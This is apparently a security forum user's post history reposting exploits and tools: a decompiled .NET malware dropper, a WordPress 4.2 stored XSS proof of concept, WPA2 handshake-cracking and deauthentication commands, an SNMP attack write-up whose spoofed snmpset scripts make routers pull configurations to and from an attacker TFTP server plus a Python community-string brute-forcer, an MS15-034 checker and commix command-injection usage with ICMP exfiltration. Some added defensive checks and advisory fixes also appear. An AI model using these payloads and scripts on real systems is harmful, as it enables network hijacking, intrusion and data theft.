
Nytro

Everything posted by Nytro

  1. It's relative. The opcode "eb 17" == "jump 0x17 bytes": 8048062 (the next address) + 0x17 == 8048079. It's odd that it's "jmp 8048079" and not "jmp 08048078", because at "08048078" is the call that pushes "/bin/sh" onto the stack. Ah, damn. If you look at the shellcode in the C program: \xeb\x16\x5e\x31 is "eb 16", i.e. "jmp 08048078".
  2. You probably like women from Korea or Japan, not China.
  3. Malware. It copies some crap (badly bound, unencrypted) into AppData. The thing is written in .NET and is easy to read:

         public object Xtraer()
         {
             object obj2;
             int num2;
             try
             {
                 int num3;
             Label_0001:
                 ProjectData.ClearProjectError();
                 int num = -2;
             Label_0009:
                 num3 = 2;
                 // write the first embedded payload (Dat[1]) next to Ruta1 and run it
                 FileSystem.FileOpen(1, this.Ruta1 + @"\ndwkdwmm.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared, -1);
             Label_0028:
                 num3 = 3;
                 FileSystem.FilePut(1, this.Dat[1], -1L, false);
             Label_003D:
                 num3 = 4;
                 FileSystem.FileClose(new int[] { 1 });
             Label_0052:
                 num3 = 5;
                 Interaction.Shell(this.Ruta1 + @"\ndwkdwmm.exe", AppWinStyle.NormalFocus, false, -1);
             Label_006E:
                 num3 = 6;
                 // same again for the second embedded payload (Dat[2]) under Ruta2
                 FileSystem.FileOpen(2, this.Ruta2 + @"\lklslslowlsloloaolsl.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared, -1);
             Label_008D:
                 num3 = 7;
                 FileSystem.FilePut(2, this.Dat[2], -1L, false);
             Label_00A2:
                 num3 = 8;
                 FileSystem.FileClose(new int[] { 2 });
             Label_00B7:
                 num3 = 9;
                 Interaction.Shell(this.Ruta2 + @"\lklslslowlsloloaolsl.exe", AppWinStyle.NormalFocus, false, -1);
                 // ... (decompiled listing cut off here in the original post)

     Real scan: https://www.virustotal.com/ro/file/8c6ac3cac91fe069cf49888f81eecc11733b788cc8bb0eb4b40e96dc2460f108/analysis/1430732314/
  4. Disable "Facebook platform" in your Facebook settings.
  5. WordPress 4.2 stored XSS
     From: Jouko Pynnonen <jouko () iki fi>
     Date: Mon, 27 Apr 2015 05:15:46 +0300

     OVERVIEW
     Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator's password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system.

     DETAILS
     If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two other recently published stored XSS vulnerabilities affecting the WordPress core. The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid UTF-8 character to truncate the comment, this time an excessively long comment text is used for the same effect. In these two cases the injected JavaScript apparently can't be triggered in the administrative Dashboard, so these exploits require getting around comment moderation e.g. by posting one harmless comment first.

     PROOF OF CONCEPT
     Enter the following as a comment:
         <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA [64 kb] ...'></a>
     This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53 and 5.5.41.

     SOLUTION
     Disable comments (Dashboard, Settings/Discussion, select as restrictive options as possible). Do not approve any comments.

     CREDITS
     The vulnerability was discovered by Jouko Pynnönen of Klikki Oy. An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html
     -- Jouko Pynnönen <jouko () iki fi>
     Klikki Oy - http://klikki.fi - @klikkioy

     Source: Bugtraq: WordPress 4.2 stored XSS
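The failure mode in the advisory, as an added Python simulation (not WordPress code and not from the advisory): an input filter accepts a quoted title attribute, the database column then silently cuts the value at its 65535-byte limit, and the stored row is no longer what was validated. The allow-list regex, the column limit and the "extra=1" stand-in attribute are constructed; the hardened variant models the defence of refusing, before the insert, any comment the column cannot hold in full.

```python
import re
from typing import Optional

# Constructed limit for the simulation: a MySQL TEXT column holds 65535 bytes.
TEXT_COLUMN_BYTES = 65535

# Deliberately narrow stand-in for the comment allow-list: the only tag
# accepted is <a> with a single-quoted title attribute.
ALLOWED_TAG = re.compile(r"<a title='[^']*'></a>")


def sanitize(comment: str) -> Optional[str]:
    """Return the comment unchanged if every tag matches the allow-list, else None."""
    leftover = ALLOWED_TAG.sub("", comment)
    return None if "<" in leftover else comment


def db_store_truncating(value: str) -> str:
    """Simulate a non-strict MySQL server silently cutting a TEXT value at 65535 bytes."""
    return value.encode("utf-8")[:TEXT_COLUMN_BYTES].decode("utf-8", "ignore")


def post_comment_vulnerable(comment: str) -> Optional[str]:
    """Filter, then store: the stored row can differ from what was validated."""
    clean = sanitize(comment)
    return None if clean is None else db_store_truncating(clean)


def post_comment_hardened(comment: str) -> Optional[str]:
    """Filter, then refuse anything the column could not hold in full."""
    clean = sanitize(comment)
    if clean is None or len(clean.encode("utf-8")) > TEXT_COLUMN_BYTES:
        return None
    return db_store_truncating(clean)


def attribute_still_quoted(stored: str) -> bool:
    """True when the title value is still closed by its quote (an even number of quotes)."""
    return stored.count("'") % 2 == 0


def oversized_comment() -> str:
    """Constructed input with the advisory's shape: an allow-listed <a> whose title
    runs past the column limit; 'extra=1' is a harmless stand-in for the injected part."""
    padding = "A" * (TEXT_COLUMN_BYTES + 100)
    return "<a title='x extra=1 " + padding + "'></a>"


if __name__ == "__main__":
    stored = post_comment_vulnerable(oversized_comment())
    print("vulnerable path stored it, quote still closed:", attribute_still_quoted(stored))
    print("hardened path stored it:", post_comment_hardened(oversized_comment()) is not None)
```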
  6. Well done.
  7. Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full four-way handshake is then used in a dictionary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.

     Install
         $ sudo python setup.py install

     Sample use
         $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"
     -r Where to read input pcap file with half handshake (works with full handshakes too)
     -m AP mac address (From the 'fake' access point that was used during the capture)
     -s AP SSID
     -d (optional) Where to read dictionary from

     Capturing half handshakes
     To listen for device probes the aircrack suite can be used as follows
         sudo airmon-ng start wlan0
         sudo airodump-ng mon0
     You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted. Set up a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything. In Ubuntu this can be done as described here: 3 Ways to Create Wifi Hotspot in Ubuntu 14.04 (Android Support) | UbuntuHandbook. Capture traffic on this interface. In Linux this can be achieved with tcpdump:
         sudo tcpdump -i wlan0 -s 65535 -w file.cap

     (optional) Deauthenticate clients from nearby WiFi networks to increase probes
     If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks: deauthentication [Aircrack-ng]

     Source: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
  8. Contents
     1. NtGlobalFlag
     2. Heap flags
     3. The Heap
     4. Thread Local Storage
     5. Anti-Step-Over
     6. Hardware
        A. Hardware breakpoints
        B. Instruction Counting
        C. Interrupt 3
        D. Interrupt 0x2d
        E. Interrupt 0x41
        F. MOV SS
     7. APIs
        A. Heap functions
        B. Handles
           i. OpenProcess
           ii. CloseHandle
           iii. CreateFile
           iv. LoadLibrary
           v. ReadFile
        C. Execution Timing
        D. Process-level
           i. CheckRemoteDebuggerPresent
           ii. Parent Process
           iii. CreateToolhelp32Snapshot
           iv. DbgBreakPoint
           v. DbgPrint
           vi. DbgSetDebugFilterState
           vii. IsDebuggerPresent
           viii. NtQueryInformationProcess
           ix. OutputDebugString
           x. RtlQueryProcessHeapInformation
           xi. NtQueryVirtualMemory
           xii. RtlQueryProcessDebugInformation
           xiii. SwitchToThread
           xiv. Toolhelp32ReadProcessMemory
           xv. UnhandledExceptionFilter
           xvi. VirtualProtect
        E. System-level
           i. FindWindow
           ii. NtQueryObject
           iii. NtQuerySystemInformation
           iv. Selectors
        F. User-interface
           i. BlockInput
           ii. FLD
           iii. NtSetInformationThread
           iv. SuspendThread
           v. SwitchDesktop
        G. Uncontrolled execution
           i. CreateProcess
           ii. CreateThread
           iii. DebugActiveProcess
           iv. Enum...
           v. GenerateConsoleCtrlEvent
           vi. NtSetInformationProcess
           vii. NtSetLdtEntries
           viii. QueueUserAPC
           ix. RaiseException
           x. RtlProcessFlsData
           xi. WriteProcessMemory
           xii. Intentional exceptions
        H. Conclusion
     Download: http://pferrie.host22.com/papers/antidebug.pdf
  9. Hacking networks with SNMP
     Posted on April 21, 2015 by Torstein

     Summary
     Exploiting common misconfigurations in network systems allows an attacker to gather and use information to take over and control network devices. This can be done just as easily to core equipment as to Customer-Premises Equipment (CPE). A large scale attack will make it possible to hijack an entire Internet Service Provider (ISP) within a very short time. This demonstration will be done against a virtualized Cisco network, but the same techniques apply to other vendors like Juniper, HP, Linux and others.

     Virtualization
     To prevent doing any damage to real networks, I will use GNS3 with Cisco to emulate a basic WAN. As for the attacking computer, a virtual Kali Linux will be attached to the network.
     Attacker IP: 80.200.43.20
     Cisco configuration example for SNMP and NTP:
         interface GigabitEthernet0/0
          ip address 88.0.3.10 255.255.255.0
         !
         ip access-list standard management
          remark ### NTP ###
          permit 80.2.0.64
          remark ### SNMP ###
          permit 80.2.0.33
         !
         snmp-server community _________ RW management
         !
         line vty 0 4
          access-class management in
         !
         ntp server 80.2.0.64

     Discovering devices
     The initial scan plays an important role in discovering remote vulnerable devices. SNMP configured with an access-list will still indicate an open port when you connect to it. The access-list will of course deny any type of request you make to the device unless the packet comes from an allowed IP. One of the easiest ways to discover what type of network device you are up against is by running an NTP query. By configuring "ntp server x.x.x.x", we are not only synchronizing the device to that time-server, but it also turns the device into an NTP server itself. This allows us to find some unwanted information like equipment type and Refid, which is equal to the NTP server's server, along with a possible target for NTP reflection attacks. Apply some common sense, whois lookups and brute DNS tools; it won't take long before you know where the management server pool is. Cisco devices vulnerable to CVE-2014-3309 also seem to be open for NTP queries like this.
         ntp server 80.2.0.64
         ntp access-group peer management
     This can be avoided by configuring an access-list associated with the NTP configuration, firewalling the device or Control Plane Policing.

     Hacking SNMP Blindfolded
     Spoofing the UDP packets' source address will bypass the SNMP access-list "management", and by blasting away thousands of passwords/sec one may find the SNMP community string. The question is, how do we know when we found the correct community string? By sending IP-spoofed Object Identifiers (OIDs) to the SNMP Management Information Base (MIB), we are able to tell the router to execute a command IF our community string is accepted. I decided to do some performance testing on live equipment, and a Cisco 881-k9 was only able to handle 40000 attacks/min due to poor CPU performance. Split a dictionary between 100 CPEs like the 881-k9 and you will be able to test ~4 million passwords/min. So, how is this really done?
         Spoof source IP: 80.2.0.64, Destination mr router: 88.0.3.10
         Hello mr router. The secret is "public", please ping 80.200.43.20
         - wrong secret, request dropped -
         Hello mr router. The secret is "private", please ping 80.200.43.20
         - correct secret, request accepted -
         - sending ICMP packet to 80.200.43.20 as you asked for -
         Network sniffer detecting a ICMP packet from mr router(88.0.3.10)
         Correct secret was found for mr router between line(RTT+0.1sec) and line(current time)
     We got the community, so how to get access? More spoofing! Sending another batch of spoofed OIDs to the router, we are now able to tell the router to upload its configuration to a TFTP server. (I had some issues with TFTP in Kali, so I booted an Ubuntu machine running xinetd with the IP 80.200.43.21.) After analyzing the router configuration, we can make a few modifications like adding a new user and removing the management access-lists for VTY. Now we can upload the new configuration back to the router with similar OIDs asking the router to download a file from the TFTP server and import it to the running-config.

     How to protect your equipment
     1. BCP 38/RFC 2827
        Source-address filter your network; a router will stop any packets not matching the reverse route for the sender's source address. BCP38 should be enabled at the edge of your network facing both customers and other Internet Service Providers. This not only protects you and others against this type of attack, but also against UDP reflection DDoS attacks. Warning: A network with asymmetrical routing may experience issues with BCP38.
     2. SNMPv3
        SNMP version 3 offers both username and password support. Spoofing SNMPv3 is way more difficult than SNMPv1/2c due to password and packet encryption, the discovery handshake and message integrity checks.
     3. Filtering
        Deny NTP and SNMP with Access Control Lists (ACL), Control Plane Policing (CoPP) or firewalls.
     4. Testing
        Do a network scan on equipment before you deploy a new model to check for unwanted services and ports.

     Edit: after speaking with Cisco PSIRT, I was recommended the following materials to fortify and protect network devices. There won't be any security advisory/CVE since the UDP spoofing attack is a known issue, even considering it's a new attack vector.
     - Cisco Guide to Harden Cisco IOS Device
     - Team CYMRU – Secure IOS template

     Concept code

     Download config
         #!/bin/bash
         STRING=private
         IP=88.0.3.10
         SOURCEIP=80.2.0.64
         TFTP=80.200.43.21
         FILENAME=running-config
         # send the requests with the spoofed (ACL-permitted) source address
         iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP
         # CISCO-CONFIG-COPY-MIB ccCopyEntry, row index 111: .14 RowStatus (6 = destroy,
         # 1 = active), .2 protocol (1 = tftp), .3 source and .4 destination file type
         # (4 = runningConfig, 1 = networkFile), .5 server address, .6 file name
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
         iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP

     Upload config
         #!/bin/bash
         STRING=private
         IP=88.0.3.10
         SOURCEIP=80.2.0.64
         TFTP=80.200.43.21
         FILENAME=change-config
         iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP
         # same ccCopyEntry columns as above, with source = networkFile (1) and
         # destination = runningConfig (4)
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 1
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 4
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME
         snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
         iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP

     Blind Password cracking – POC
         #!/usr/bin/python
         # Python 2 script (print statements, str.decode('hex'))
         import socket, sys, time
         from scapy.all import *
         from multiprocessing import Process, Array

         iptoping = '\x50\xc8\x2b\x14'  # 80.200.43.20 in hex
         ipaddr = ['88.0.3.14', '88.0.3.6', '88.0.3.10']  # target routers
         spoofedserver = '80.2.0.64'  # ntpq -c rv TARGET_CPE | grep refid
                                      # Need to be permitted by router's snmp ACL
         snmpfile = 'best-snmppasswords.txt'
         defaultdelay = 0.0011
         rtt = 1  # ms delay to targets

         # check if loopback-interface with spoofed IP is up and running
         stest = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
         try:
             stest.bind((spoofedserver, 0))
         except:
             print "ifconfig lo:0 " + spoofedserver + " netmask 255.255.255.255 up"
             sys.exit()

         rtt = rtt / 1000.0  # ms -> s (float division; integer division gives 0 in Python 2)
         defaultdelay = int(defaultdelay * 1000000)  # stored as microseconds in a shared int Array


         def snmpscan(ip, delayhigh, stop, dictline, c, minline, maxline):
             # one worker per target: walk the dictionary and send the ping-table
             # SetRequests for each candidate community, pacing by delay
             f = open(snmpfile, 'r')
             s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             delay = delayhigh[c] / 1000000.0
             s.bind((spoofedserver, 500 + c))
             counter = 1
             for community in f:
                 if stop[c] == True:
                     return
                 # only the lines inside [minline, maxline] are tried when narrowing down
                 if (minline[c] <= counter and maxline[c] >= counter) or maxline[c] == 0:
                     community = community.rstrip()
                     snmp = []
                     # packet length need to be included in SNMP (single-byte BER lengths)
                     length = str("%0.2x" % (len(community))).decode('hex')
                     splen = str("%0.2x" % (len(community) + 42)).decode('hex')
                     xplen = str("%0.2x" % (len(community) + 49)).decode('hex')
                     yplen = str("%0.2x" % (len(community) + 45)).decode('hex')
                     # SNMPv1 SetRequests against CISCO-PING-MIB row 333:
                     # destroy row, createAndWait, owner, protocol, address, count, activate
                     snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                                 '\xa3\x23\x02\x04\x1e\x4d\xa9\x90\x02\x01\x00\x02\x01\x00\x30'
                                 '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                                 '\x01\x10\x82\x4d\x02\x01\x06')
                     snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                                 '\xa3\x23\x02\x04\x1a\x91\xe1\x36\x02\x01\x00\x02\x01\x00\x30'
                                 '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                                 '\x01\x10\x82\x4d\x02\x01\x05')
                     snmp.append('\x30' + xplen + '\x02\x01\x00\x04' + length + community +
                                 '\xa3\x2a\x02\x04\x6e\xaf\x5b\x8c\x02\x01\x00\x02\x01\x00\x30'
                                 '\x1c\x30\x1a\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                                 '\x01\x0f\x82\x4d\x04\x08\x61\x6e\x79\x5f\x6e\x61\x6d\x65')
                     snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                                 '\xa3\x23\x02\x04\x66\x9c\x88\x99\x02\x01\x00\x02\x01\x00\x30'
                                 '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                                 '\x01\x02\x82\x4d\x02\x01\x01')
                     snmp.append('\x30' + yplen + '\x02\x01\x00\x04' + length + community +
                                 '\xa3\x26\x02\x04\x13\x3a\x66\x29\x02\x01\x00\x02\x01\x00\x30'
                                 '\x18\x30\x16\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                                 '\x01\x03\x82\x4d\x04\x04' + iptoping)
                     snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                                 '\xa3\x23\x02\x04\x21\x98\x9b\xcd\x02\x01\x00\x02\x01\x00\x30'
                                 '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                                 '\x01\x04\x82\x4d\x02\x01\x01')  # last hex = number of icmp packets
                     snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                                 '\xa3\x23\x02\x04\x7c\xe9\x79\x42\x02\x01\x00\x02\x01\x00\x30'
                                 '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                                 '\x01\x10\x82\x4d\x02\x01\x01')
                     for payload in snmp:
                         s.sendto(payload, (ip, 161))
                     dictline[c] = counter
                     time.sleep(delay)
                     if stop[c] == True:
                         return
                 counter += 1
             f.close()
             stop[c] = True


         def reply(packet):
             # an ICMP echo from a target means one of the recently sent communities was accepted
             try:
                 if packet[ICMP]:
                     pos = ipaddr.index(packet[IP].src)
             except:
                 return
             for x in processes:
                 if x.name == ipaddr[pos]:
                     # candidates sent during the last RTT+0.05 s are the possible matches
                     minline[pos] = int((dictline[pos] - (0.05 + rtt) / (delay[pos] / 1000000.0)) + 1) if 0 < (0.05 + rtt) / (delay[pos] / 1000000.0) else 1
                     maxline[pos] = dictline[pos]
                     if minline[pos] == maxline[pos]:
                         f = open(snmpfile, 'r')
                         g = 1
                         for lines in f:
                             if g == maxline[pos]:
                                 print 'SNMP Community for', ipaddr[pos], 'is:', lines.rstrip()
                             g += 1
                     else:
                         print '%s snmp community found between line %d and %d in %s. Please wait while narrowing it down.' % (ipaddr[pos], int((dictline[pos] - (0.05 + rtt) / (delay[pos] / 1000000.0)) + 1) if 0 < (0.05 + rtt) / (delay[pos] / 1000000.0) else 1, dictline[pos], snmpfile)
                         stop[pos] = True  # ask the running worker to stop
                         x.terminate()
                         time.sleep(1)  # wait for existing thread to stop
                         dictline[pos] = 1
                         stop[pos] = False
                         delay[pos] = delay[pos] * 5  # slower pace over the narrowed range
                         p = Process(target=snmpscan, name=ipaddr[pos], args=(ipaddr[pos], delay, stop, dictline, pos, minline, maxline))
                         processes[pos] = p
                         p.start()


         if __name__ == "__main__":
             global processes
             processes = []
             dictline = Array('i', [1] * len(ipaddr))
             stop = Array('i', [False] * len(ipaddr))
             minline = Array('i', [0] * len(ipaddr))
             maxline = Array('i', [0] * len(ipaddr))
             delay = Array('i', [defaultdelay] * len(ipaddr))
             c = 0
             for a in ipaddr:
                 p = Process(target=snmpscan, name=a, args=(a, delay, stop, dictline, c, minline, maxline))
                 processes.append(p)
                 p.start()
                 c += 1
             sniff(prn=reply, filter="icmp", store=0)

     Source: https://0x41.no/hacking-networks-with-snmp/
  10. Microsoft expands its bug bounty programs to include Azure, Sway, and Project Spartan | VentureBeat | Security | by Emil Protalinski
  11. The Dislike button can be removed from the AdminCP quickly.
  12. '''
MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in
terrible ways. It is based off a change in HTTP!UlpParseRange in which an
error code is returned as a result of a call to HTTP!RtlULongLongAdd when
evaluating the upper and lower range of an HTTP range request.
-BF

8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
'''
import socket
import random

ipAddr = ""
hexAllFfff = "18446744073709551615"
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print " [*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
    print " [*] Not IIS"
    exit(0)
client_socket.close()

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
    print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
    print " [*] Looks Patched"
else:
    print " [*] Unexpected response, cannot discern patch status"

Sursa: http://pastebin.com/raw.php?i=ypURDPc4
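An added example, not part of the pastebin script: the arithmetic the disassembly above hints at, written out as an overflow-checked add in the role of RtlULongLongAdd, a Range header parser that uses it so that bytes=0-18446744073709551615 is rejected instead of wrapping, and a small scanner that flags such Range values in captured request headers. The request list is constructed; nothing here talks to a server.

```python
import re

ULONGLONG_MAX = 2**64 - 1
_RANGE = re.compile(r"^bytes=(\d*)-(\d*)$")   # single range only, for clarity


def rtl_ulonglong_add(a, b):
    """Checked unsigned 64-bit add in the spirit of the RtlULongLongAdd call in
    the disassembly: (True, sum) on success, (False, None) instead of wrapping."""
    s = a + b
    return (True, s) if s <= ULONGLONG_MAX else (False, None)


def parse_byte_range(header_value, content_length):
    """Return (first, last) for 'bytes=first-last', or None when the range is
    malformed, does not fit in 64 bits, or is unsatisfiable (HTTP 416).
    The length last - first + 1 goes through the checked add; that is the step
    the MS15-034 change added to HTTP!UlpParseRange."""
    m = _RANGE.match(header_value.strip())
    if not m:
        return None
    first_s, last_s = m.groups()
    if not first_s and not last_s:
        return None
    if not first_s:                          # suffix form bytes=-N: last N bytes
        n = int(last_s)
        if n == 0 or n > ULONGLONG_MAX or content_length == 0:
            return None
        return (max(0, content_length - n), content_length - 1)
    first = int(first_s)
    last = int(last_s) if last_s else content_length - 1
    if first > ULONGLONG_MAX or last > ULONGLONG_MAX:
        return None                          # does not fit in a ULONGLONG at all
    if last < first:
        return None
    ok, _ = rtl_ulonglong_add(last - first, 1)
    if not ok:                               # bytes=0-18446744073709551615 lands here
        return None
    if first >= content_length:
        return None
    return (first, min(last, content_length - 1))


def is_suspicious_range(header_value):
    """Flag Range values whose length arithmetic overflows 64 bits: the shape of
    the probe the checker above sends, useful when reviewing proxy or WAF logs."""
    m = _RANGE.match(header_value.strip())
    if not m or not m.group(2):
        return False
    first = int(m.group(1)) if m.group(1) else 0
    last = int(m.group(2))
    if last > ULONGLONG_MAX:
        return True
    if last < first:
        return False
    return not rtl_ulonglong_add(last - first, 1)[0]


def scan_request_headers(requests):
    """requests: list of (client_ip, headers dict). Returns the client IPs that
    sent a suspicious Range header, in order of appearance."""
    return [ip for ip, hdrs in requests if is_suspicious_range(hdrs.get("Range", ""))]


# Constructed sample traffic (addresses from the documentation range).
SAMPLE_REQUESTS = [
    ("198.51.100.7", {"Host": "stuff", "Range": "bytes=0-18446744073709551615"}),
    ("198.51.100.8", {"Host": "stuff", "Range": "bytes=0-1023"}),
    ("198.51.100.9", {"Host": "stuff"}),
]
```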
  13. The fuzzing module is cool. It doesn't do much, but if you go through the responses by hand it can be very useful.
  14. Changes: A new attack mode has been added. A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time. Various other updates and additions.
  15. When I took it, and probably still now: pen and paper. And there are two parts: Computer Science and Math.
  16. The idea was to do privilege escalation / bypass UAC. Where is this application's folder, Program Files or AppData? If it's in Program Files, crap, you have no write permission there as a "normal user". Then, does the application run as Admin? Even if it has to be started manually (that is, not at startup) and even if the UAC prompt appears, that prompt will be legitimate; but if not, "tunis-pula"'s exploits are useless crap.
  17. "unserialize" is magic. In the worst sense of the word.
  18. commix { v0.1b }

Automated All-in-One OS Command Injection and Exploitation Tool
Copyright © 2015 Anastasios Stasinopoulos (@ancst)

General Information

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used by web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.

Disclaimer

The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!

Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Download commix by cloning the Git repository:

    git clone https://github.com/stasinopoulos/commix.git commix

Usage

    Usage: python commix.py [options]

Options
    -h, --help            Show help and exit.
    --verbose             Enable the verbose mode.
    --install             Install 'commix' to your system.
    --version             Show version number and exit.
    --update              Check for updates (apply if any) and exit.

Target
    This option has to be provided, to define the target URL.
    --url=URL             Target URL.
    --url-reload          Reload target URL after command execution.

Request
    These options can be used, to specify how to connect to the target URL.
    --host=HOST           HTTP Host header.
    --referer=REFERER     HTTP Referer header.
    --user-agent=AGENT    HTTP User-Agent header.
    --cookie=COOKIE       HTTP Cookie header.
    --headers=HEADERS     Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
    --proxy=PROXY         Use a HTTP proxy (e.g. '127.0.0.1:8080').
    --auth-url=AUTH_..    Login panel URL.
    --auth-data=AUTH..    Login parameters and data.
    --auth-cred=AUTH..    HTTP Basic Authentication credentials (e.g. 'admin:admin').

Injection
    These options can be used, to specify which parameters to inject and to provide custom injection payloads.
    --data=DATA           POST data to inject (use 'INJECT_HERE' tag).
    --suffix=SUFFIX       Injection payload suffix string.
    --prefix=PREFIX       Injection payload prefix string.
    --technique=TECH      Specify a certain injection technique : 'classic', 'eval-based', 'time-based' or 'file-based'.
    --maxlen=MAXLEN       The length of the output on time-based technique (Default: 10000 chars).
    --delay=DELAY         Set Time-delay for time-based and file-based techniques (Default: 1 sec).
    --base64              Use Base64 (enc)/(de)code trick to prevent false-positive results.
    --tmp-path=TMP_P..    Set remote absolute path of temporary files directory.
    --icmp-exfil=IP_..    Use the ICMP exfiltration technique (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
    --alter-shell         Use an alternative os-shell (Python).

Usage Examples

Exploiting Damn Vulnerable Web App:

    python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

    python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'"

Exploiting OWASP Mutillidae using Extra headers and HTTP proxy:

    python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Exploiting Persistence using ICMP exfiltration technique:

    su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5

Sursa: https://github.com/stasinopoulos/commix
  19. NSA analysts are being paid to watch a LOT of porn

Graham Cluley | April 6, 2015 12:45 am

